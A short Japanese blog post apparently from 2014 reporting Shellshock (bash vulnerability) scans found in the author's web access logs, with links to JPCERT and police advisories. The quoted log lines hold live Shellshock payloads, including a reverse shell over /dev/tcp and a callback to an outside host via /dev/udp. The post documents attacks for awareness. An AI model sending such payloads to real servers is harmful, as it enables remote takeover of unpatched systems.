adsense

2014年9月27日土曜日

bashの脆弱性(Shellshock)を狙ったリクエスト

bashの脆弱性 (shellshock)のニュースが世間を騒がせていますが、直近の当サイトへのアクセスログを確認したところ、こんなアクセスを観測しました。

x.x.x.x - - [25/Sep/2014:06:25:51 +0000] "GET / HTTP/1.0" 200 26104 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
x.x.x.x - - [26/Sep/2014:12:56:07 +0000] "GET / HTTP/1.0" 200 25833 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/x.x.x.x/3333 0>&1'"
x.x.x.x- - [25/Sep/2014:11:55:03 +0000] "GET / HTTP/1.1" 200 26087 "-" "() { :; }; echo -e \"Content-Type: text/plain\\n\"; echo qQQQQQq"
x.x.x.x - - [25/Sep/2014:13:58:01 +0000] "GET / HTTP/1.1" 200 26076 "-" "() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444"

やはりスキャンが横行しているようですね。アクセス元は中国やアメリカでした。

スキャン元のソースIPアドレスを"shellshock"のタグ名でいくつか登録しておきました。
登録タグの検索ページから確認してみてください。
http://www.iputilities.net/tagsearch.html

もし同様のスキャンを見つけた方は、"shellshock"タグで登録頂けると幸いです。


参考:
GNU bash の脆弱性に関する注意喚起
https://www.jpcert.or.jp/at/2014/at140037.html

警視庁 Bash の脆弱性を標的としたアクセスの観測について
http://www.npa.go.jp/cyberpolice/detect/pdf/20140925-2.pdf




0 件のコメント:

コメントを投稿